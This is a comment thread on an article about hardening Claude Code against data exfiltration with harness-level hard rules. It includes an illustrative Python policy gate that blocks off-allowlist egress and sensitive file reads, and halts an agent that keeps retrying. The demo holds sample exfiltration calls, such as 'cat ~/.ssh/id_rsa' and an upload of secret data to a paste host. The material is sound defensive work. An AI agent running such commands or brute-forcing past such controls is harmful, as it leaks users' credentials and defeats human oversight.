Prevent agent data exfiltration by moving from system prompts to hard rules. Learn how to secure Claude Code using an agent harness and Cedar policy as code.
“Prompt and pray” … LoL perfect
Hah, ultimately it encapsulates what we do when we try to control the model at the prompt layer. For a defense-in-depth strategy, we need to assume that the agent is already prompt-injected or experiencing emergent behavior and create controls that the model can't ever bypass.
Assumption of vulnerability/exposure/exploit is simply key. Across all security domains I think.
For sure, I think what's tricky with agents is that they don't give up, so that if they're blocked by something, they'll brute-force the action space to get it done, even if it means breaking a rule or engaging in unwanted behavior.
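The two ideas in this exchange, a control the model cannot talk its way past and a response to an agent that keeps retrying after being blocked, can both live in the harness rather than the prompt. The following is an added example written for this thread, not code from the article, from Claude Code, or from any commenter. It assumes a hypothetical harness in which every tool call is routed through `PolicyGate.check` before execution; the tool names, the egress allowlist, and the sensitive-path list are constructed for illustration. The gate enforces deterministic deny rules and, because a prompt-injected agent may brute-force the action space, trips a session-level kill switch after repeated denials so the retries become a detection signal instead of a path around the rule.

```python
"""Hard-rule policy gate for agent tool calls, enforced outside the model.

Added example (not from the article or from Claude Code). Assumes a
hypothetical harness that calls PolicyGate.check(call) before running any
tool. Rules are data the model cannot see or edit, so a prompt injection
can change what the model asks for but not what the harness permits.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass
class ToolCall:
    tool: str          # e.g. "http_request", "read_file", "bash" (constructed names)
    args: dict


@dataclass
class Decision:
    allowed: bool
    reason: str


@dataclass
class PolicyGate:
    # Constructed allowlist: the only host the agent may send data to.
    egress_allowlist: frozenset = frozenset({"api.internal.example"})
    # Constructed list of path fragments the agent must never touch.
    sensitive_paths: tuple = ("/etc/", "~/.ssh", ".env")
    # After this many denials the session is halted: an agent that keeps
    # probing blocked actions is itself the alert.
    max_denials: int = 3
    denials: list = field(default_factory=list)
    tripped: bool = False

    def check(self, call: ToolCall) -> Decision:
        """Gate one tool call. Once tripped, every call is denied."""
        if self.tripped:
            return Decision(False, "gate tripped: session halted after repeated denials")
        decision = self._evaluate(call)
        if not decision.allowed:
            self.denials.append((call.tool, decision.reason))
            if len(self.denials) >= self.max_denials:
                self.tripped = True
        return decision

    def _evaluate(self, call: ToolCall) -> Decision:
        # Egress rule: block any network destination not on the allowlist,
        # which is the direct control against data exfiltration.
        if call.tool == "http_request":
            host = urlparse(call.args.get("url", "")).hostname or ""
            if host not in self.egress_allowlist:
                return Decision(False, f"egress to {host!r} not allowlisted")
        # Filesystem rule: applies to direct reads and to shell commands
        # alike, so switching tools does not bypass it.
        if call.tool in ("read_file", "bash"):
            target = call.args.get("path") or call.args.get("command", "")
            for fragment in self.sensitive_paths:
                if fragment in target:
                    return Decision(False, f"access to sensitive path {fragment!r} denied")
        return Decision(True, "ok")


if __name__ == "__main__":
    gate = PolicyGate()
    # Constructed sequence: one allowed call, then three attempts that
    # would leak data, each blocked; the third trips the session.
    calls = [
        ToolCall("http_request", {"url": "https://api.internal.example/v1/report"}),
        ToolCall("http_request", {"url": "https://paste.example/upload?data=secret"}),
        ToolCall("read_file", {"path": "/home/dev/project/.env"}),
        ToolCall("bash", {"command": "cat ~/.ssh/id_rsa"}),
    ]
    for c in calls:
        d = gate.check(c)
        print(f"{c.tool:13} allowed={d.allowed!s:5} {d.reason}")
    print("tripped:", gate.tripped)
```

The point of keeping `denials` and `tripped` in the gate rather than in the prompt is that the agent's persistence is recorded where the model cannot reset it; in a real harness the denial log would be forwarded to the same place as other security telemetry.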
Excellent piece!
Thanks Chris!